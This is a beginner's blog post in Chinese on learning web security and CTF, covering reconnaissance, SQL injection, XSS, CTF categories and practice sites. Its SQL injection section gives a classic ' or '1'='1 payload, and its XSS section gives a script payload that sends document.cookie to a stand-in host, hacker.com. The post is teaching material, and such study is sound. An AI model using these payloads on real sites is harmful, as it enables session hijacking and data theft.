<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">


  
  
  <link rel="stylesheet" href="/lib/needsharebutton/needsharebutton.css">























<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2">

<link rel="stylesheet" href="/css/main.css?v=7.1.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.jpg?v=7.1.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=7.1.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=7.1.0">


  <link rel="mask-icon" href="/images/logo.svg?v=7.1.0" color="#222">







<script id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '7.1.0',
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false,"dimmer":false},
    back2top: true,
    back2top_sidebar: false,
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




<script>
	(function(){
		if(''){
			if (prompt('请输入文章密码','') !== ''){
				alert('密码错误！');
				history.back();
			}
		}
	})();
</script>
  <meta name="description" content="这篇文章写给完全不懂安全，想学安全的人。我也很菜，有哪些说的不对的，大佬轻点喷。 我本身是做Web的，其它的可能也会涉及到，比如逆向或者其他也有，但本文主要还是针对安全基础和Web应用安全（渗透）方面。 密码是：我是萌新（当然，真正的大佬肯定有办法绕过这个特别简单的密码验证）">
<meta name="keywords" content="技术,安全">
<meta property="og:type" content="article">
<meta property="og:title" content="安全咋学啊，搞不懂啊">
<meta property="og:url" content="https://willv.cn/2020/05/11/web-security-start/index.html">
<meta property="og:site_name" content="时光">
<meta property="og:description" content="这篇文章写给完全不懂安全，想学安全的人。我也很菜，有哪些说的不对的，大佬轻点喷。 我本身是做Web的，其它的可能也会涉及到，比如逆向或者其他也有，但本文主要还是针对安全基础和Web应用安全（渗透）方面。 密码是：我是萌新（当然，真正的大佬肯定有办法绕过这个特别简单的密码验证）">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://ae01.alicdn.com/kf/Hd8e600b6e9534539aedb98b08acba9b36.jpg">
<meta property="og:image" content="https://ae01.alicdn.com/kf/Hddbaf497aa6b4d9dacb0ea253e5c15dfv.jpg">
<meta property="og:image" content="http://i0.hdslb.com/bfs/album/c135f612f8b743cc3c266cb50bbf9547c1a53ac1.png">
<meta property="og:updated_time" content="2020-05-11T15:18:48.058Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="安全咋学啊，搞不懂啊">
<meta name="twitter:description" content="这篇文章写给完全不懂安全，想学安全的人。我也很菜，有哪些说的不对的，大佬轻点喷。 我本身是做Web的，其它的可能也会涉及到，比如逆向或者其他也有，但本文主要还是针对安全基础和Web应用安全（渗透）方面。 密码是：我是萌新（当然，真正的大佬肯定有办法绕过这个特别简单的密码验证）">
<meta name="twitter:image" content="https://ae01.alicdn.com/kf/Hd8e600b6e9534539aedb98b08acba9b36.jpg">



  <link rel="alternate" href="/atom.xml" title="时光" type="application/atom+xml">



  
  
  <link rel="canonical" href="https://willv.cn/2020/05/11/web-security-start/">



<script id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>安全咋学啊，搞不懂啊 | 时光</title>
  






  <script>
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?62382cd2dc6f4cabe6aae29a96f8cc47";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>







  <noscript>
  <style>
  .use-motion .motion-element,
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-title { opacity: initial; }

  .use-motion .logo,
  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">时光</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="切换导航栏">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">

    
    
    
      
    

    

    <a href="/" rel="section"><i class="menu-item-icon fa fa-fw fa-home"></i> <br>首页</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-about">

    
    
    
      
    

    

    <a href="/about/" rel="section"><i class="menu-item-icon fa fa-fw fa-user"></i> <br>关于</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">

    
    
    
      
    

    

    <a href="/tags/" rel="section"><i class="menu-item-icon fa fa-fw fa-tags"></i> <br>标签</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">

    
    
    
      
    

    

    <a href="/archives/" rel="section"><i class="menu-item-icon fa fa-fw fa-archive"></i> <br>归档</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-projects">

    
    
    
      
    

    

    <a href="/projects/" rel="section"><i class="menu-item-icon fa fa-fw fa-code"></i> <br>项目</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-writeup">

    
    
    
      
    

    

    <a href="/writeups/" rel="section"><i class="menu-item-icon fa fa-fw fa-flag"></i> <br>writeup</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-papers">

    
    
    
      
    

    

    <a href="/papers-reader/" rel="section"><i class="menu-item-icon fa fa-fw fa-file-pdf-o"></i> <br>读论文</a>

  </li>
        
        
        
          
          <li class="menu-item menu-item-friends">

    
    
    
      
    

    

    <a href="/friends/" rel="section"><i class="menu-item-icon fa fa-fw fa-group"></i> <br>友链</a>

  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>搜索</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  
    <div class="reading-progress-bar"></div>
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://willv.cn/2020/05/11/web-security-start/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="WILL_V">
      <meta itemprop="description" content="辣鸡CTF选手，渣Web，逆向只会F5的渣渣">
      <meta itemprop="image" content="https://ae01.alicdn.com/kf/Hc2d66c4827bf408f987afb1fc777d0129.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="时光">
    </span>

    
      <header class="post-header">

        
        
          <h2 class="post-title" itemprop="name headline">安全咋学啊，搞不懂啊

              
            
          </h2>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              

              
                
              

              <time title="创建时间：2020-05-11 13:39:06 / 修改时间：23:18:48" itemprop="dateCreated datePublished" datetime="2020-05-11T13:39:06+08:00">2020-05-11</time>
            

            
              

              
            
          </span>

          

          
            
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>这篇文章写给<strong>完全不懂安全，想学安全的人</strong>。我也<strong>很菜</strong>，有哪些说的不对的，大佬轻点喷。</p>
<p>我本身是做Web的，其它的可能也会涉及到，比如逆向或者其他也有，但本文主要还是针对安全基础和Web应用安全（渗透）方面。</p>
<p>密码是：我是萌新（当然，真正的大佬肯定有办法绕过这个特别简单的密码验证）</p>
<a id="more"></a>
<script>
    (function(){
            if (prompt('请输入文章密码') !== '我是萌新'){
                alert('密码错误！');
                history.back();
            }
    })();
</script>

<h2 id="我的路线"><a href="#我的路线" class="headerlink" title="我的路线"></a>我的路线</h2><p>先说一下我是怎么学安全的。可以参考。</p>
<p><img src="https://ae01.alicdn.com/kf/Hd8e600b6e9534539aedb98b08acba9b36.jpg" alt="自我介绍"></p>
<p>我是大概高一，差不多11年左右接触的安全，高二时开始自己动手。一开始自己学了点C、然后到处找资料，各种论坛网站QQ群瞎学。我感觉我高中学的很杂，什么免杀挂马，也没人带，全靠自学。很有那个时代的味道。</p>
<p>上大学时，我就想学计算机，最好是信息安全。最后去了一个计算机还可以的学校读了计算机，这才开始系统的学习。因为我很明确要搞安全，大一时，进了一个实验室。实验室主要是用C#做教育系统，但是有几个人是做安全的。其中有一个大佬，通过这个大佬，我知道了CTF，走上了这条打比赛的路。这个大佬也是曾经的大陆顶尖CTF战队FlappyPig创办人之一。</p>
<p>因为一些理念的问题，待了一年我就离开了这个实验室。接下来一直到大三上半年我都是一个人找CTF比赛自己打，周围也不认识做安全的，就一个人单干。其中大二的时候去了一个安全公司实(mo)习(yu)了一个月，也在那里学会了一些渗透实战的技巧。大三下的时候，正逢国家重视，网络安全提升到国家层面，学院里组织了一次CTF比赛，赛后组建了CTF战队和安全社团，我也乘着在毕业之前找到了队友打了几次比赛。</p>
<p>我学安全还是跟着CTF来的，而且大多数是自学没人带，可以参考，但不太建议照着做。</p>
<p>不说关于我的废话了，下面进入正题。</p>
<h2 id="技能树"><a href="#技能树" class="headerlink" title="技能树"></a>技能树</h2><p>GitHub上有挺多我觉得画的不错的技能树。这里是两个技能树，虽然也不太全，但是也可以参考。</p>
<p><img src="https://ae01.alicdn.com/kf/Hddbaf497aa6b4d9dacb0ea253e5c15dfv.jpg" alt="安全技能树"></p>
<p><img src="http://i0.hdslb.com/bfs/album/c135f612f8b743cc3c266cb50bbf9547c1a53ac1.png" alt="渗透测试"></p>
<p>更多的技能树：<a href="https://github.com/phith0n/Mind-Map" target="_blank" rel="noopener">https://github.com/phith0n/Mind-Map</a> </p>
<p>遇到看不懂的就去查，如果看不懂就不看了就永远也看不懂了。</p>
<h2 id="Web安全（渗透）"><a href="#Web安全（渗透）" class="headerlink" title="Web安全（渗透）"></a>Web安全（渗透）</h2><blockquote>
<p>需要技能：</p>
<p>SQL、JavaScript、一种网页编程语言（如PHP）、Python（如果会更好，不会也可以）</p>
</blockquote>
<p>Web，怎么说呢，我觉得可以假设这么一个环境。</p>
<p>假设你是一个黑客，想黑掉一个网站，你应该怎么做？如果你不懂，那么就假设你是一个小偷（感觉不太好的比喻），想去偷某个小区的某一户人家的某一个东西。小区可能防护严密，怎么绕过重重保安？</p>
<p>看了那么多的法制节目，你也应该知道，小偷要偷东西，一开始要踩点。哪里防护薄弱，可不可以混进小区，如果不可以，墙上有没有洞钻进去。实战中的渗透也是这样的。信息收集，目标开放了哪些服务，哪些地方可能有漏洞，通过这个漏洞拿到了什么权限，可不可以提升权限，拿到更多的东西。看普法节目看柯南你会学到很多的作案技巧，看实际渗透过程你也会知道怎么渗透。</p>
<p>可能会用到一些名词，萌新可能看不懂，但是我一一解释也太费篇幅和时间，建议不会的直接百度，百度都有答案。</p>
<h3 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h3><p>信息收集一般是渗透的第一步</p>
<p>目标的服务可以识别服务器指纹，用了什么CMS，服务器软件是什么版本的，Apache、IIS漏洞可不可以用，服务器语言是什么，PHP、Java、ASP，用了什么数据库，MySQL、SqlServer等等。</p>
<p>此外，也可以使用nmap、masscan等扫描目标开放的端口看有什么服务。敏感端口有：3389、3306等等。</p>
<p>GoogleHacking也非常有用。（有没有熟悉小区情况的中介，他们应该比较了解小区结构）</p>
<p>如果直接攻击主站难度大，不妨从旁站入手。（小区正门不好进，侧门试试，有哪些侧门）</p>
<p>目标网站有哪些业务，哪些业务防护薄弱。（公司有哪些产品，哪些不重要没人关心）</p>
<p>寻找IP段，有的IP属于目标，但不绑定域名。（有的商店属于公司，但不挂公司的牌子）</p>
<h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><p>SQL注入危害极大。比如，网页代码这么写：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">String query = <span class="string">"SELECT * FROM accounts WHEREcustID='"</span> + request.getParameter(<span class="string">"id"</span>) +<span class="string">"'"</span>;</span><br></pre></td></tr></table></figure>
<p>那我传参<code>id=&#39; or &#39;1&#39;=&#39;1</code>是不是一拼接SQL语句就把所有数据给查出来了。SQL注入就是这样，通过构造恶意的请求参数来使目标的系统执行自己的SQL语句。SQL注入可以实现在目标系统上的任意命令执行，拿下服务器也很有可能，常常是攻击的首选方法，而且成功率还不低。</p>
<p>接下来开拓一下思路。如果，服务器有WAF（防火墙），对用户输入进行了过滤，比如不能输入or、空格、select等等，怎么绕过防火墙来实现自己想执行的SQL语句呢。</p>
<h3 id="XSS（跨站脚本）"><a href="#XSS（跨站脚本）" class="headerlink" title="XSS（跨站脚本）"></a>XSS（跨站脚本）</h3><p>SQL注入是执行自己的SQL语句，那么XSS就是执行自己的JS脚本。如果网页代码这么写：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">page+=<span class="string">"&lt;inputname='creditcard'type='TEXT‘value='"</span>+request.getParameter（<span class="string">"CC"</span>）+<span class="string">"'&gt;"</span>;</span><br></pre></td></tr></table></figure>
<p>那我传参</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">'&gt;<span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="javascript"><span class="built_in">document</span>.location=<span class="string">'http://hacker.com/xss.php?foo='</span>+<span class="built_in">document</span>.cookie</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>就把受害者的cookie传到了我的服务器之上，获取了cookie就可以劫持用户当前会话。</p>
<p>同样，XSS也可以通过WAF防御，怎么绕过呢。</p>
<h3 id="其它"><a href="#其它" class="headerlink" title="其它"></a>其它</h3><p>其实我觉得，新手入门，刚开始能掌握SQL注入和XSS就可以了，当这两个熟悉后，自然会自发的去了解掌握其它的攻击手段，这里不详细介绍了，就说一些攻击方法和常用的东西吧，有兴趣的自己去查。</p>
<ul>
<li>SSRF</li>
<li>CSRF</li>
<li>文件上传漏洞</li>
<li>一句话木马（大马、小马、webshell）</li>
<li>SqlMap</li>
<li>Kali</li>
<li>公开漏洞的利用（CVE、exp、poc这些是啥）</li>
<li>……想起来再补充</li>
</ul>
<p>不妨去看看别人是怎么渗透的吧。以前有一个很好的网站叫乌云（wooyun），现在已经没了，不过还有在其关站前的镜像（<a href="http://wooyun.2xss.cc/bugs.php" target="_blank" rel="noopener">http://wooyun.2xss.cc/bugs.php</a> <a href="https://github.com/hanc00l/wooyun_public" target="_blank" rel="noopener">https://github.com/hanc00l/wooyun_public</a> ）。</p>
<h2 id="CTF"><a href="#CTF" class="headerlink" title="CTF"></a>CTF</h2><p>我是打CTF的，安全很多也是从CTF里学到的。通过CTF学习技术特别快。</p>
<p>搞算法的有ACM，搞安全的有CTF（Capture The Flag）。CTF就是给你一个存在漏洞的环境，你去攻击，找到藏在目标环境中的答案（flag）。主要有两种比赛类型：Jeopardy（解题）、AWD（Attack With Defence/攻防）。</p>
<p>一般题目类型有：</p>
<ul>
<li>Web：涉及到常见的Web漏洞，如注入、XSS、文件包含、代码执行、上传、SSRF、XXE、序列与反序列化等等</li>
<li>Reverse：逆向，涉及到软件逆向、破解、反汇编、反编译</li>
<li>PWN：溢出类题目，常见有栈溢出，堆溢出，在比赛中越来越常见越来越多，也越来越重要（PWN爷爷）</li>
<li>Crypto：密码学，各种加解密技术，包括古典加密技术、现代加解密技术甚至出题者自创加密技术</li>
<li>Misc：杂项，乱七八糟什么都有可能放在这里，隐写、取证、流量分析常见</li>
</ul>
<p>可以去主动的参加一些CTF比赛，没有比赛也有一些CTF的靶场。一般做完题会有人发解题思路（Writeup），不会做也可以尝试复现，慢慢就学会了。</p>
<p>列一点靶场：</p>
<p><a href="https://adworld.xctf.org.cn/" target="_blank" rel="noopener">https://adworld.xctf.org.cn/</a></p>
<p><a href="https://www.jarvisoj.com/" target="_blank" rel="noopener">https://www.jarvisoj.com/</a></p>
<p><a href="http://hackinglab.cn/" target="_blank" rel="noopener">http://hackinglab.cn/</a></p>
<p><a href="https://ctf.bugku.com/" target="_blank" rel="noopener">https://ctf.bugku.com/</a></p>
<p><a href="https://xss.haozi.me/" target="_blank" rel="noopener">https://xss.haozi.me/</a></p>
<p><a href="http://test.ctf8.com/" target="_blank" rel="noopener">http://test.ctf8.com/</a></p>
<p><a href="https://harrynull.tech/cipher/" target="_blank" rel="noopener">https://harrynull.tech/cipher/</a></p>
<p><a href="https://www.hacker101.com/" target="_blank" rel="noopener">https://www.hacker101.com/</a></p>
<p><a href="https://hackme.inndy.tw/" target="_blank" rel="noopener">https://hackme.inndy.tw/</a></p>
<p><a href="http://ctf.dieteam.club/" target="_blank" rel="noopener">http://ctf.dieteam.club/</a></p>
<p><a href="http://www.nanhack.com/" target="_blank" rel="noopener">http://www.nanhack.com/</a></p>
<p>比赛：</p>
<p><a href="https://captf.com/practice-ctf/" target="_blank" rel="noopener">https://captf.com/practice-ctf/</a></p>
<p><a href="https://ctftime.org/" target="_blank" rel="noopener">https://ctftime.org/</a></p>
<p><a href="https://www.xctf.org.cn/ctfs/recently/" target="_blank" rel="noopener">https://www.xctf.org.cn/ctfs/recently/</a></p>
<p>我也会写一些Writeup: <a href="http://willv.cn/writeups/">http://willv.cn/writeups/</a></p>
<h2 id="学习链接"><a href="#学习链接" class="headerlink" title="学习链接"></a>学习链接</h2><p>文章中的链接还有一些其他的链接，这里发一下</p>
<p>各种安全相关思维导图整理收集：<a href="https://github.com/phith0n/Mind-Map" target="_blank" rel="noopener">https://github.com/phith0n/Mind-Map</a> </p>
<p>猪猪侠《我的白帽学习路线》：<a href="https://github.com/ring04h/papers/blob/master/%E6%88%91%E7%9A%84%E7%99%BD%E5%B8%BD%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF--20170325.pdf" target="_blank" rel="noopener">https://github.com/ring04h/papers/blob/master/%E6%88%91%E7%9A%84%E7%99%BD%E5%B8%BD%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF--20170325.pdf</a></p>
<p>Software-Security-Learning：<a href="https://github.com/CHYbeta/Software-Security-Learning" target="_blank" rel="noopener">https://github.com/CHYbeta/Software-Security-Learning</a></p>
<p>Web-Security-Learning：<a href="https://github.com/CHYbeta/Web-Security-Learning" target="_blank" rel="noopener">https://github.com/CHYbeta/Web-Security-Learning</a></p>
<p>从零开始内网渗透学习：<a href="https://github.com/l3m0n/pentest_study" target="_blank" rel="noopener">https://github.com/l3m0n/pentest_study</a></p>
<p>个人域渗透学习笔记：<a href="https://github.com/uknowsec/Active-Directory-Pentest-Notes" target="_blank" rel="noopener">https://github.com/uknowsec/Active-Directory-Pentest-Notes</a></p>
<p>OWASP Top10：<a href="http://www.owasp.org.cn/owasp-project/2017-owasp-top-10" target="_blank" rel="noopener">http://www.owasp.org.cn/owasp-project/2017-owasp-top-10</a></p>
<p>Freebuf：<a href="https://www.freebuf.com/" target="_blank" rel="noopener">https://www.freebuf.com/</a></p>
<p>安全客：<a href="https://www.anquanke.com/" target="_blank" rel="noopener">https://www.anquanke.com/</a></p>
<p>先知社区：<a href="https://xz.aliyun.com/" target="_blank" rel="noopener">https://xz.aliyun.com/</a></p>
<p>看雪安全论坛：<a href="https://bbs.pediy.com/" target="_blank" rel="noopener">https://bbs.pediy.com/</a></p>
<p>吾爱破解：<a href="https://www.52pojie.cn/" target="_blank" rel="noopener">https://www.52pojie.cn/</a></p>
<p>土司：<a href="https://www.t00ls.net/" target="_blank" rel="noopener">https://www.t00ls.net/</a></p>
<p>安全文摘：<a href="http://wiki.ioin.in/" target="_blank" rel="noopener">http://wiki.ioin.in/</a></p>

      
    </div>

    
      


    

    
    
    

    

    
      
    
    
      <div>
        <div id="reward-container">
  <div></div>
  <button id="reward-button" disable="enable" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">

    
      
      
        
      
      <div style="display: inline-block">
        <img src="https://ooo.0o0.ooo/2018/01/02/5a4afb332f3b6.png" alt="WILL_V 微信支付">
        <p>微信支付</p>
      </div>
    
      
      
        
      
      <div style="display: inline-block">
        <img src="https://ooo.0o0.ooo/2018/01/02/5a4afb332ef22.png" alt="WILL_V 支付宝">
        <p>支付宝</p>
      </div>
    

  </div>
</div>

      </div>
    

    
      <div>
        




  



<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>WILL_V</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    
    <a href="https://willv.cn/2020/05/11/web-security-start/" title="安全咋学啊，搞不懂啊">https://willv.cn/2020/05/11/web-security-start/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/技术/" rel="tag"><i class="fa fa-tag"></i> 技术</a>
          
            <a href="/tags/安全/" rel="tag"><i class="fa fa-tag"></i> 安全</a>
          
        </div>
      

      
      
        <div class="post-widgets">
        

        

        
          
          <div class="social_share">
            
            
              <div id="needsharebutton-postbottom">
                <span class="btn">
                  <i class="fa fa-share-alt" aria-hidden="true"></i>
                </span>
              </div>
            
            
          </div>
        
        </div>
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/01/zhiyun-xss/" rel="next" title="zhiyun xss">
                <i class="fa fa-chevron-left"></i> zhiyun xss
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/06/14/rf-ga/" rel="prev" title="强化学习与遗传算法">
                强化学习与遗传算法 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>


  </div>


          </div>
          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>Please enable JavaScript to view the comments powered by Disqus.</noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="https://ae01.alicdn.com/kf/Hc2d66c4827bf408f987afb1fc777d0129.jpg" alt="WILL_V">
            
              <p class="site-author-name" itemprop="name">WILL_V</p>
              <div class="site-description motion-element" itemprop="description">辣鸡CTF选手，渣Web，逆向只会F5的渣渣</div>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives/">
                
                    <span class="site-state-item-count">19</span>
                    <span class="site-state-item-name">日志</span>
                  </a>
                </div>
              

              

              
                
                
                <div class="site-state-item site-state-tags">
                  
                    
                      <a href="/tags/">
                    
                  
                    
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">13</span>
                    <span class="site-state-item-name">标签</span>
                  </a>
                </div>
              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://github.com/WWILLV" title="GitHub &rarr; https://github.com/WWILLV" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="mailto:admin@willv.cn" title="E-Mail &rarr; mailto:admin@willv.cn"><i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://twitter.com/twwillv" title="Twitter &rarr; https://twitter.com/twwillv" rel="noopener" target="_blank"><i class="fa fa-fw fa-twitter"></i>Twitter</a>
                </span>
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://weibo.com/u/2693120655" title="微博 &rarr; https://weibo.com/u/2693120655" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>微博</a>
                </span>
              
            </div>
          

          
             <div class="cc-license motion-element" itemprop="license">
              
              
                
              
              
              
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
             </div>
          

          
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#我的路线"><span class="nav-number">1.</span> <span class="nav-text">我的路线</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#技能树"><span class="nav-number">2.</span> <span class="nav-text">技能树</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Web安全（渗透）"><span class="nav-number">3.</span> <span class="nav-text">Web安全（渗透）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#信息收集"><span class="nav-number">3.1.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SQL注入"><span class="nav-number">3.2.</span> <span class="nav-text">SQL注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#XSS（跨站脚本）"><span class="nav-number">3.3.</span> <span class="nav-text">XSS（跨站脚本）</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#其它"><span class="nav-number">3.4.</span> <span class="nav-text">其它</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CTF"><span class="nav-number">4.</span> <span class="nav-text">CTF</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#学习链接"><span class="nav-number">5.</span> <span class="nav-text">学习链接</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 – <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">WILL_V</span>

  

  
</div>









        








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>
























  



  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script src="/lib/reading_progress/reading_progress.js"></script>


  


